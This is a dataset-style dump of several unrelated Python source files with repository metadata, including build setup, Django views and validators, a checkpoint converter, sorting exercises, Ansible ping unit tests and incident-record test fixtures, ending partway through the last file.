setup(
name='ohos-build',
version='0.2.0',
description='OHOS build command line tool',
long_description=LONG_DESCRIPTION,
url='',
author='',
author_email='',
license=LICENSE,
python_requires='>=3.7',
packages=['hb', 'hb.build', 'hb.set', 'hb.cts',
'hb.common', 'hb.env', 'hb.clean', 'hb.deps'],
package_dir={'hb': 'hb'},
package_data={'hb': ['common/config.json']},
install_requires=['prompt_toolkit==1.0.14'],
entry_points={
'console_scripts': [
'hb=hb.__main__:main',
]
},
)
| 31.22449 | 74 | 0.668627 |
9309c40fc73d55bbb646a2a5a468f4242b2a94a5
| 167 |
py
|
Python
|
furniture_store/furniture_store/web/validators.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | 1 |
2022-03-03T10:16:14.000Z
|
2022-03-03T10:16:14.000Z
|
furniture_store/furniture_store/web/validators.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
furniture_store/furniture_store/web/validators.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
from django.core.exceptions import ValidationError
def validate_min_price(value):
if value <= 0:
raise ValidationError('Price must be positive number!')
| 23.857143 | 63 | 0.742515 |
17be761c0fc0d7ada774d93be4698867fc568651
| 1,612 |
py
|
Python
|
official/cv/c3d/src/tools/ckpt_convert.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/c3d/src/tools/ckpt_convert.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/c3d/src/tools/ckpt_convert.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import sys
import torch
from mindspore import Tensor
from mindspore.train.serialization import save_checkpoint
from src.c3d_model import C3D
def torch_to_mindspore(torch_file_path, mindspore_file_path):
ckpt = torch.load(torch_file_path, map_location=torch.device('cpu'))
new_params_list = []
for _, v in ckpt.items():
new_params_list.append(v.numpy())
mindspore_params_list = []
network = C3D(num_classes=487)
for v, k in zip(new_params_list, network.parameters_dict().keys()):
if 'fc8' in k:
continue
mindspore_params_list.append({'name': k, 'data': Tensor.from_numpy(v)})
save_checkpoint(mindspore_params_list, mindspore_file_path)
print('convert pytorch ckpt file to mindspore ckpt file ok !')
if __name__ == '__main__':
torch_ckpt_file_path = sys.argv[1]
mindspore_ckpt_file_path = sys.argv[2]
torch_to_mindspore(torch_ckpt_file_path, mindspore_ckpt_file_path)
| 35.043478 | 79 | 0.707196 |
17fbd1cbc70a96f19c45d1dd0f121bad2c6d6e97
| 3,243 |
py
|
Python
|
python/readJson.py
|
Greakz/mdh-cmake-cubevis
|
6c64ec0e14dcdd07e69fa1f018aa7954eeeaf173
|
[
"MIT"
] | null | null | null |
python/readJson.py
|
Greakz/mdh-cmake-cubevis
|
6c64ec0e14dcdd07e69fa1f018aa7954eeeaf173
|
[
"MIT"
] | 5 |
2021-08-24T11:09:54.000Z
|
2021-08-24T21:14:15.000Z
|
python/readJson.py
|
Greakz/mdh-cmake-cubevis
|
6c64ec0e14dcdd07e69fa1f018aa7954eeeaf173
|
[
"MIT"
] | null | null | null |
def readConstants(constants_list):
constants = []
for attribute, value in constants_list.items():
constants.append({"name": attribute, "cname": "c_" + attribute, "value": value})
return constants
def readClocks(clocks_lists):
clocks = {"par": [], "seq": []}
for attribute, value in clocks_lists["par_time"].items():
clocks["par"].append({
"name": attribute,
"cname": "cp_" + attribute,
"start_str": value[0],
"cname_start_f": "start_cp_" + attribute,
"end_str": value[1],
"cname_end_f": "end_cp_" + attribute,
"cname_size_f": "size_cp_" + attribute,
})
for attribute, value in clocks_lists["seq_time"].items():
clocks["seq"].append({
"name": attribute,
"cname": "cs_" + attribute,
"start_str": value[0],
"cname_start_f": "start_cs_" + attribute,
"end_str": value[1],
"cname_end_f": "end_cs_" + attribute,
"cname_size_f": "size_cs_" + attribute,
})
return clocks
def readCubeNests(cube_nests_json):
cube_nests = []
for attribute, value in cube_nests_json.items():
cube_list = []
for clock_attr, clock_val in value.items():
cube_list.append({
"clock_mask": clock_val["clock_mask"],
"name": clock_attr,
"depth": clock_val["depth"],
"x_dim_str": clock_val["x-dim"], # array with [0] = min , [1] = max, [?2] = grid_alignment_clock
"y_dim_str": clock_val["y-dim"], # array with [0] = min , [1] = max, [?2] = grid_alignment_clock
"z_dim_str": clock_val["z-dim"], # array with [0] = min , [1] = max, [?2] = grid_alignment_clock
"cname_x_dim_start_f": "x_dim_start_" + attribute + "_" + clock_attr,
"cname_y_dim_start_f": "y_dim_start_" + attribute + "_" + clock_attr,
"cname_z_dim_start_f": "z_dim_start_" + attribute + "_" + clock_attr,
"cname_x_dim_end_f": "x_dim_end_" + attribute + "_" + clock_attr,
"cname_y_dim_end_f": "y_dim_end_" + attribute + "_" + clock_attr,
"cname_z_dim_end_f": "z_dim_end_" + attribute + "_" + clock_attr,
"cname_x_dim_jump_f": "x_dim_jump_" + attribute + "_" + clock_attr,
"cname_y_dim_jump_f": "y_dim_jump_" + attribute + "_" + clock_attr,
"cname_z_dim_jump_f": "z_dim_jump_" + attribute + "_" + clock_attr,
"cname_x_dim_size_f": "x_dim_size_" + attribute + "_" + clock_attr,
"cname_y_dim_size_f": "y_dim_size_" + attribute + "_" + clock_attr,
"cname_z_dim_size_f": "z_dim_size_" + attribute + "_" + clock_attr,
"cname_x_dim_jump_offset_f": "x_dim_jump_offset_" + attribute + "_" + clock_attr,
"cname_y_dim_jump_offset_f": "y_dim_jump_offset_" + attribute + "_" + clock_attr,
"cname_z_dim_jump_offset_f": "z_dim_jump_offset_" + attribute + "_" + clock_attr
})
cube_nests.append({
"name": attribute,
"cubes": cube_list,
})
return cube_nests
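# Hedged usage sketch, not part of the original module: how these readers might be
# driven from a JSON config. Only the 'par_time'/'seq_time' keys are implied by the
# code above; the file name and the 'constants'/'cube_nests' keys are assumptions.
if __name__ == '__main__':
    import json
    with open('visualization.json') as handle:   # illustrative path
        config = json.load(handle)
    constants = readConstants(config['constants'])
    clocks = readClocks(config)                  # needs 'par_time' and 'seq_time'
    cube_nests = readCubeNests(config['cube_nests'])
    print(len(constants), len(clocks['par']), len(cube_nests))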
| 47.691176 | 115 | 0.5609 |
a4e0d84eac4640d28599a5d7e6360fd28fbdebd6
| 529 |
py
|
Python
|
python_lib/OmegaExpansion/onionI2C.py
|
SaschaMzH/hucon
|
830b6c5e21c2c7316c61e8afdf708066374b9b62
|
[
"BSD-3-Clause"
] | 2 |
2019-09-25T13:39:22.000Z
|
2019-09-26T10:06:13.000Z
|
python_lib/OmegaExpansion/onionI2C.py
|
SaschaMzH/hucon
|
830b6c5e21c2c7316c61e8afdf708066374b9b62
|
[
"BSD-3-Clause"
] | 44 |
2019-09-25T14:35:48.000Z
|
2021-08-20T17:26:12.000Z
|
python_lib/OmegaExpansion/onionI2C.py
|
SaschaMzH/hucon
|
830b6c5e21c2c7316c61e8afdf708066374b9b62
|
[
"BSD-3-Clause"
] | 8 |
2019-09-25T13:53:07.000Z
|
2022-02-24T19:23:44.000Z
|
import random
class OnionI2C(object):
def __init__(self):
print('[orange]I2C: init onionI2C')
def writeByte(self, devAddress, address, value):
print('[orange]I2C: write to device "%x" on address 0x%02x the value 0x%02x' % (devAddress, address, value))
def readBytes(self, devAddress, address, size):
print('[orange]I2C: read from device "%x" at address 0x%02x the amount of %d bytes' % (devAddress, address, size))
ret_list = []
for i in range(size):
ret_list.append(random.randint(0, 255))
return ret_list
| 31.117647 | 116 | 0.705104 |
a4e8793b7f82209247b7bd8e0a4d05c0afe7a245
| 145 |
py
|
Python
|
Beginner/03. Python/qr-coder/qrcoder.py
|
ankita080208/Hacktoberfest
|
2be849e89285260e7b6672f42979943ad6bbec78
|
[
"MIT"
] | 3 |
2021-03-16T16:44:04.000Z
|
2021-06-07T17:32:51.000Z
|
Beginner/03. Python/qr-coder/qrcoder.py
|
ankita080208/Hacktoberfest
|
2be849e89285260e7b6672f42979943ad6bbec78
|
[
"MIT"
] | null | null | null |
Beginner/03. Python/qr-coder/qrcoder.py
|
ankita080208/Hacktoberfest
|
2be849e89285260e7b6672f42979943ad6bbec78
|
[
"MIT"
] | 2 |
2020-10-12T15:58:02.000Z
|
2020-10-20T05:31:11.000Z
|
import pyqrcode, sys
data = sys.argv[1]
for ch in enumerate(data):
qrch = pyqrcode.create(ch[1])
qrch.png('./qrs/'+str(ch[0])+'.png', scale=6)
| 24.166667 | 46 | 0.655172 |
3505121efb46dfcafb96e1279683a59f1bb111fb
| 885 |
py
|
Python
|
volley/concurrency.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 8 |
2022-02-24T14:59:24.000Z
|
2022-03-31T04:37:55.000Z
|
volley/concurrency.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 3 |
2022-02-27T17:08:52.000Z
|
2022-03-18T13:11:01.000Z
|
volley/concurrency.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 2 |
2022-02-24T15:03:07.000Z
|
2022-03-15T03:12:00.000Z
|
import asyncio
import contextvars
import functools
from typing import Any, Awaitable, Callable
from volley.util import FuncEnvelope
async def run_in_threadpool(func: Callable[..., Any], *args: Any) -> Any:
loop = asyncio.get_event_loop()
child = functools.partial(func, *args)
context = contextvars.copy_context()
func = context.run
args = (child,)
return await loop.run_in_executor(None, func, *args)
async def run_worker_function(f: FuncEnvelope, message: Any, ctx: Any) -> Any:
if f.needs_msg_ctx:
f.func = functools.partial(f.func, **{f.message_ctx_param: ctx})
if f.is_coroutine:
return await f.func(message)
else:
return await run_in_threadpool(f.func, message)
def run_async(func: Callable[..., Awaitable[Any]]) -> Callable[..., None]:
def wrapper() -> None:
asyncio.run(func())
return wrapper
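# Hedged usage sketch, not part of the original module: run_async turns an async
# entry point into a plain callable, e.g. for a thread target or console script.
if __name__ == "__main__":
    async def _demo() -> None:
        # Any awaitable work would go here; sleep(0) just yields control once.
        await asyncio.sleep(0)
        print("ran inside asyncio.run")
    run_async(_demo)()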
| 27.65625 | 78 | 0.683616 |
35422aee7b446637d87eafdf2812c2c57a976621
| 3,884 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/icx/test_icx_ping.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/icx/test_icx_ping.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/icx/test_icx_ping.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.plugins.modules.network.icx import icx_ping
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
from ..icx_module import TestICXModule, load_fixture
class TestICXPingModule(TestICXModule):
''' Class used for Unit Tests agains icx_ping module '''
module = icx_ping
def setUp(self):
super(TestICXPingModule, self).setUp()
self.mock_run_commands = patch('ansible_collections.community.general.plugins.modules.network.icx.icx_ping.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
super(TestICXPingModule, self).tearDown()
self.mock_run_commands.stop()
def load_fixtures(self, commands=None):
def load_from_file(*args, **kwargs):
module = args
commands = kwargs['commands']
output = list()
for command in commands:
filename = str(command).split(' | ')[0].replace(' ', '_')
output.append(load_fixture('icx_ping_%s' % filename))
return output
self.run_commands.side_effect = load_from_file
def test_icx_ping_expected_success(self):
''' Test for successful pings when destination should be reachable '''
set_module_args(dict(count=2, dest="8.8.8.8"))
commands = ['ping 8.8.8.8 count 2']
fields = {'packets_tx': 2}
self.execute_module(commands=commands, fields=fields)
def test_icx_ping_expected_failure(self):
''' Test for unsuccessful pings when destination should not be reachable '''
set_module_args(dict(count=2, dest="10.255.255.250", state="absent"))
self.execute_module()
def test_icx_ping_unexpected_success(self):
''' Test for successful pings when destination should not be reachable - FAIL. '''
set_module_args(dict(count=2, dest="8.8.8.8", state="absent"))
self.execute_module(failed=True)
def test_icx_ping_unexpected_failure(self):
''' Test for unsuccessful pings when destination should be reachable - FAIL. '''
set_module_args(dict(count=2, dest="10.255.255.250", timeout=45))
fields = {'packets_tx': 1, 'packets_rx': 0, 'packet_loss': '100%', 'rtt': {'max': 0, 'avg': 0, 'min': 0}}
self.execute_module(failed=True, fields=fields)
def test_icx_ping_expected_success_cmd(self):
''' Test for successful pings when destination should be reachable '''
set_module_args(dict(count=5, dest="8.8.8.8", ttl=70))
commands = ['ping 8.8.8.8 count 5 ttl 70']
self.execute_module(commands=commands)
def test_icx_ping_invalid_ttl(self):
''' Test for invalid range of ttl for reachable '''
set_module_args(dict(dest="8.8.8.8", ttl=300))
commands = ['ping 8.8.8.8 ttl 300']
self.execute_module(failed=True, sort=False)
def test_icx_ping_invalid_timeout(self):
''' Test for invalid range of timeout for reachable '''
set_module_args(dict(dest="8.8.8.8", timeout=4294967296))
self.execute_module(failed=True, sort=False)
def test_icx_ping_invalid_count(self):
''' Test for invalid range of count for reachable '''
set_module_args(dict(dest="8.8.8.8", count=4294967296))
self.execute_module(failed=True, sort=False)
def test_icx_ping_invalid_size(self):
'''Test for invalid range of size for reachable '''
set_module_args(dict(dest="8.8.8.8", size=10001))
self.execute_module(failed=True, sort=False)
| 44.643678 | 129 | 0.679712 |
52cf303b394a69fea65dd94904d08bb4f6c8a0e6
| 916 |
py
|
Python
|
Algorithms/Sorting/QuickSortInPlace.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
Algorithms/Sorting/QuickSortInPlace.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
Algorithms/Sorting/QuickSortInPlace.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
#coding:utf-8
n = int(raw_input())
ar = map(int, raw_input().split())
def quick_sort_lomuto(ar, low, high):
if high-low < 1:
return
p = ar[high]
i = low
for j in xrange(low, high):
if ar[j] < p:
ar[j], ar[i] = ar[i], ar[j]
i += 1
ar[i], ar[high] = p, ar[i]
print ' '.join(map(str, ar))
    quick_sort_lomuto(ar, low, i-1)
    quick_sort_lomuto(ar, i+1, high)
def quick_sort_Hoare(ar, low, high):
if high > low:
p = ar[low]
i = low
j = high
while 1:
while ar[i] < p:
i += 1
while ar[j] > p:
j -= 1
if i >= j:
break
ar[i], ar[j] = ar[j], ar[i]
print ' '.join(map(str, ar))
quick_sort_Hoare(ar, low, j-1)
quick_sort_Hoare(ar, j+1, high)
quick_sort_Hoare(ar, 0, n-1)
| 19.489362 | 41 | 0.426856 |
d82eb559660e77f85696bcdf9d0fabea7101652f
| 1,316 |
py
|
Python
|
src/service/MeteorologyService.py
|
dreaming-coder/RadarSet
|
c912298d0d6058c6647986524e5d95a205b51c1d
|
[
"MIT"
] | null | null | null |
src/service/MeteorologyService.py
|
dreaming-coder/RadarSet
|
c912298d0d6058c6647986524e5d95a205b51c1d
|
[
"MIT"
] | null | null | null |
src/service/MeteorologyService.py
|
dreaming-coder/RadarSet
|
c912298d0d6058c6647986524e5d95a205b51c1d
|
[
"MIT"
] | null | null | null |
from concurrent.futures.process import ProcessPoolExecutor
from datetime import datetime
from dateutil.relativedelta import relativedelta
from type import PathLike
from utils.db.dao import MeteorologyDao, StationDao
from utils.io.JLoader import read_j
from utils.io.XLoader import get_j_files_list
__all__ = ["extract_meteorology", "compute_rain_6_min"]
def _load_j_file(file: PathLike):
month_meteorology = read_j(file)
dao = MeteorologyDao()
items = []
for i in range(len(month_meteorology)):
items.append(month_meteorology[i])
dao.add_list(items)
def extract_meteorology(num_workers: int = 4):
files = get_j_files_list()
with ProcessPoolExecutor(max_workers=num_workers) as executor:
executor.map(_load_j_file, files)
def compute_rain_6_min():
dao = StationDao()
stations = dao.query_stations()
dao = MeteorologyDao()
for station_no in stations:
start_date = datetime.strptime("2016-12-31 20:00:00", "%Y-%m-%d %H:%M:%S")
while True:
r = dao.update_rain_6min(station_no=station_no, dt=start_date)
if r < 0:
break
start_date = start_date + relativedelta(minutes=1)
if __name__ == '__main__':
_load_j_file(r"E:\硕士\大论文\RadarSet\resources\AJ\2017\53697\J53697-201706.TXT")
| 28.608696 | 82 | 0.708207 |
52092148ede78d0d5d858723a5f8ca2efafdcd29
| 1,961 |
py
|
Python
|
workshop_petstagram/workshop_petstagram/main/views/pet_photos.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | 1 |
2022-03-03T10:16:14.000Z
|
2022-03-03T10:16:14.000Z
|
workshop_petstagram/workshop_petstagram/main/views/pet_photos.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
workshop_petstagram/workshop_petstagram/main/views/pet_photos.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect
from workshop_petstagram.main.forms import EditPetPhotoForm, AddPetPhotoForm
from workshop_petstagram.main.models import PetPhoto
from workshop_petstagram.main.templatetags.profiles import has_profile
def add_pet_photo(request):
if not has_profile():
return redirect('error page')
if request.method == "POST":
form = AddPetPhotoForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return redirect('dashboard')
else:
form = AddPetPhotoForm()
context = {
'form': form,
}
return render(request, 'photo_create.html', context)
def edit_pet_photo(request, pk):
if not has_profile():
return redirect('error page')
photo = PetPhoto.objects.get(pk=pk)
if request.method == "POST":
form = EditPetPhotoForm(request.POST, instance=photo)
if form.is_valid():
form.save()
return redirect('pet photo details', photo.pk)
else:
form = EditPetPhotoForm(instance=photo)
context = {
'form': form,
'photo': photo,
}
return render(request, 'photo_edit.html', context)
def delete_pet_photo(request, pk):
if not has_profile():
return redirect('error page')
pet_photo = PetPhoto.objects.get(pk=pk)
pet_photo.delete()
return redirect('dashboard')
def like_pet_photo(request, pk):
if not has_profile():
return redirect('error page')
pet_photo = PetPhoto.objects.get(pk=pk)
pet_photo.likes += 1
pet_photo.save()
return redirect('pet photo details', pk)
def show_pet_photo_details(request, pk):
if not has_profile():
return redirect('error page')
pet_photo = PetPhoto.objects \
.prefetch_related('tagged_pets') \
.get(pk=pk)
context = {
'pet_photo': pet_photo
}
return render(request, 'photo_details.html', context)
| 24.209877 | 76 | 0.648649 |
876c927fe69abadda45b0210c40e8cfb5884958d
| 22,978 |
py
|
Python
|
Packs/IntegrationsAndIncidentsHealthCheck/Scripts/GetFailedTasks/test_data/constants.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/IntegrationsAndIncidentsHealthCheck/Scripts/GetFailedTasks/test_data/constants.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/IntegrationsAndIncidentsHealthCheck/Scripts/GetFailedTasks/test_data/constants.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
INCIDENTS_RESULT = [
{'ModuleName': 'InnerServicesModule', 'Brand': 'Builtin', 'Category': 'Builtin', 'ID': '', 'Version': 0, 'Type': 1,
'Contents': {
'ErrorsPrivateDoNotUse': None, 'data': [
{
'CustomFields': {'dbotpredictionprobability': 0,
'detectionsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 20, 'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'remediationsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 7200,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'timetoassignment': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 0,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'urlsslverification': []}, 'ShardID': 0,
'account': '', 'activated': '0001-01-01T00:00:00Z',
'allRead': False, 'allReadWrite': False, 'attachment': None,
'autime': 1601398110261438200, 'canvases': None,
'category': '', 'closeNotes': '', 'closeReason': '',
'closed': '0001-01-01T00:00:00Z', 'closingUserId': '',
'created': '2020-09-29T16:48:30.261438285Z',
'dbotCreatedBy': 'admin', 'dbotCurrentDirtyFields': None,
'dbotDirtyFields': None, 'dbotMirrorDirection': '',
'dbotMirrorId': '', 'dbotMirrorInstance': '',
'dbotMirrorLastSync': '0001-01-01T00:00:00Z',
'dbotMirrorTags': None, 'details': '', 'droppedCount': 0,
'dueDate': '2020-10-09T16:48:30.261438285Z',
'feedBased': False, 'hasRole': False, 'id': '7',
'investigationId': '7', 'isPlayground': False,
'labels': [{'type': 'Instance', 'value': 'admin'},
{'type': 'Brand', 'value': 'Manual'}],
'lastJobRunTime': '0001-01-01T00:00:00Z',
'lastOpen': '2020-09-30T15:40:11.737120193Z',
'linkedCount': 0, 'linkedIncidents': None,
'modified': '2020-09-30T15:40:36.604919119Z',
'name': 'errors',
'notifyTime': '2020-09-29T16:48:30.436371249Z',
'occurred': '2020-09-29T16:48:30.261438058Z',
'openDuration': 62265, 'owner': '', 'parent': '',
'phase': '', 'playbookId': 'AutoFocusPolling',
'previousAllRead': False, 'previousAllReadWrite': False,
'previousRoles': None, 'rawCategory': '',
'rawCloseReason': '', 'rawJSON': '', 'rawName': 'errors',
'rawPhase': '', 'rawType': 'Unclassified', 'reason': '',
'reminder': '0001-01-01T00:00:00Z', 'roles': None,
'runStatus': 'error', 'severity': 0, 'sla': 0,
'sortValues': ['_score'], 'sourceBrand': 'Manual',
'sourceInstance': 'admin', 'status': 1,
'type': 'Unclassified', 'version': 8}, {
'CustomFields': {'dbotpredictionprobability': 0,
'detectionsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 20,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'integrationscategories': ['Utilities',
'Utilities',
'Utilities',
'Utilities',
'Endpoint',
'Messaging',
'Data Enrichment & Threat Intelligence'],
'integrationsfailedcategories': [
'Data Enrichment & Threat Intelligence',
'Endpoint'],
'numberofentriesiderrors': 0,
'numberoffailedincidents': 0,
'remediationsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 7200,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'timetoassignment': {
'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle', 'sla': 0,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'totalfailedinstances': 2,
'totalgoodinstances': 7,
'totalinstances': 9,
'unassignedincidents': [],
'urlsslverification': []}, 'ShardID': 0,
'account': '', 'activated': '0001-01-01T00:00:00Z',
'allRead': False, 'allReadWrite': False,
'attachment': None, 'autime': 1601388165826470700,
'canvases': None, 'category': '',
'closeNotes': 'Created a new incident type.',
'closeReason': '', 'closed': '0001-01-01T00:00:00Z',
'closingUserId': '',
'created': '2020-09-29T14:02:45.82647067Z',
'dbotCreatedBy': 'admin', 'dbotCurrentDirtyFields': None,
'dbotDirtyFields': None, 'dbotMirrorDirection': '',
'dbotMirrorId': '', 'dbotMirrorInstance': '',
'dbotMirrorLastSync': '0001-01-01T00:00:00Z',
'dbotMirrorTags': None, 'details': '', 'droppedCount': 0,
'dueDate': '0001-01-01T00:00:00Z', 'feedBased': False,
'hasRole': False, 'id': '3', 'investigationId': '3',
'isPlayground': False,
'labels': [{'type': 'Instance', 'value': 'admin'},
{'type': 'Brand', 'value': 'Manual'}],
'lastJobRunTime': '0001-01-01T00:00:00Z',
'lastOpen': '2020-09-30T15:40:48.618174584Z',
'linkedCount': 0, 'linkedIncidents': None,
'modified': '2020-09-30T15:41:15.184226213Z',
'name': 'Incident with error',
'notifyTime': '2020-09-29T14:09:06.048819578Z',
'occurred': '2020-09-29T14:02:45.826470478Z',
'openDuration': 686, 'owner': 'admin', 'parent': '',
'phase': '',
'playbookId': 'JOB - Integrations and Playbooks Health Check',
'previousAllRead': False, 'previousAllReadWrite': False,
'previousRoles': None, 'rawCategory': '',
'rawCloseReason': '', 'rawJSON': '',
'rawName': 'Incident with error', 'rawPhase': '',
'rawType': 'testing', 'reason': '',
'reminder': '0001-01-01T00:00:00Z', 'roles': None,
'runStatus': 'error', 'severity': 0, 'sla': 0,
'sortValues': ['_score'], 'sourceBrand': 'Manual',
'sourceInstance': 'admin', 'status': 1, 'type': 'testing',
'version': 13}, {
'CustomFields': {'dbotpredictionprobability': 0,
'detectionsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 20,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'remediationsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 7200,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'sourceusername': 'JohnJoe',
'timetoassignment': {
'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle', 'sla': 0,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'urlsslverification': []}, 'ShardID': 0,
'account': '', 'activated': '0001-01-01T00:00:00Z',
'allRead': False, 'allReadWrite': False,
'attachment': None, 'autime': 1601480646930752000,
'canvases': None, 'category': '', 'closeNotes': '',
'closeReason': '', 'closed': '0001-01-01T00:00:00Z',
'closingUserId': '',
'created': '2020-09-30T15:44:06.930751906Z',
'dbotCreatedBy': 'admin', 'dbotCurrentDirtyFields': None,
'dbotDirtyFields': None, 'dbotMirrorDirection': '',
'dbotMirrorId': '', 'dbotMirrorInstance': '',
'dbotMirrorLastSync': '0001-01-01T00:00:00Z',
'dbotMirrorTags': None, 'details': '', 'droppedCount': 0,
'dueDate': '2020-10-10T15:44:06.930751906Z',
'feedBased': False, 'hasRole': False, 'id': '48',
'investigationId': '48', 'isPlayground': False,
'labels': [{'type': 'Instance', 'value': 'admin'},
{'type': 'Brand', 'value': 'Manual'}],
'lastJobRunTime': '0001-01-01T00:00:00Z',
'lastOpen': '0001-01-01T00:00:00Z', 'linkedCount': 0,
'linkedIncidents': None,
'modified': '2020-09-30T15:46:35.843037049Z',
'name': 'Multiple Failed Logins',
'notifyTime': '2020-09-30T15:46:35.836929058Z',
'occurred': '2020-09-30T15:44:06.930751702Z',
'openDuration': 0, 'owner': 'admin', 'parent': '',
'phase': '',
'playbookId': 'Account Enrichment - Generic v2.1',
'previousAllRead': False, 'previousAllReadWrite': False,
